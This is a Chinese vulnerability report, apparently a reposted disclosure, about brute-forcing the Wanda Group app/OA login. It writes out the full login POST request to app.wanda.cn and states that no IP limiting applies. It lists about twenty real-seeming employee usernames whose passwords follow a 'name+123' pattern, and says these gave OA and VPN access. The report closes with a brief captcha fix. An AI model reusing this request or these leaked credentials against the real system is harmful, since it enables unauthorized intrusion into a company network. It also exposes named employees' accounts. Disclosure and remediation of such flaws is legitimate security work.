大连万达集团OA系统弱口令一打多一点可拨VPN企业安全分享!

大连万达集团OA%ignore_a_1%弱口令一打多一点可拨VPN


寻找聪哥,请认准cn域名

1、万达集团APP,登录接口可爆破,且对IP爆破未进行限制

2、爆破口(登录处):

POST https://app.wanda.cn/wanda3v/m/ssoLogin.html HTTP/1.1 Host: app.wanda.cn Proxy-Connection: close Accept-Encoding: gzip Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Length: 321 Connection: close User-Agent: 万达集团 3.5.2 rv:6612 (iPad; iPhone OS 8.4; zh_CN) appname=ctx&password=admin123&username=admin&resolution=960%2A640&vid=2a51f71011fc448cb186eb1958b0ec55&devid=7c7db2d9ec0c17619d0671d1088b21e22a3aa7c9&sysversion=8.4&devicetype=0&systype=iPhone%20OS&m=3083593347&devtype=0&appkey=7c7db2d9ec0c17619d0671d1088b21e22a3aa7c9&phonemodel=Unknown%20iPad&appversion=3.5.2

3、不到一个小时爆破了3w多个姓名,得到20+的弱口令(一下密码均为姓名+123)

lizelin

lizhengran

liliangni

wangkehui

wangqilong

wanglinhui

linanxiao

lixueying

likanghong

lijunchun

lixuejuan

wangmei

lizhengnan

liqinchun

wangjuexi

lichunlin

lixuexue

liyuxia

liyinguang

liyouxuan

lisuju

登录OA

20200427_5ea687b98c18a

20200427_5ea687c875e78

20200427_5ea687cce537b

20200427_5ea687d223785

20200427_5ea687dc7a4d9

连接VPN

20200427_5ea687dd8e9dc

解决方案:

在通讯录里看到好多人得OA用户名后面都有不规则的数字,

加验证码防爆破。

http://www.dengb.com/qyaq/1096216.htmlwww.dengb.comtruehttp://www.dengb.com/qyaq/1096216.htmlTechArticle大连万达集团OA系统弱口令一打多一点可拨VPN 寻找聪哥,请认准cn域名 1、万达集团APP,登录接口可爆破,且对IP爆破未进行限制 2、爆破口…

—-想了解更多的企业安全相关处理怎么解决关注

本站无法对海量内容真伪性鉴别,请勿相信本站任何号码,邮件,站外网址等信息,如有需要,请自行甄别。版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至net@163.com举报,一经查实,本站将立刻删除。
(0)
上一篇 2022年11月27日 上午11:56
下一篇 2022年11月27日 上午11:58

相关推荐

发表回复

登录后才能评论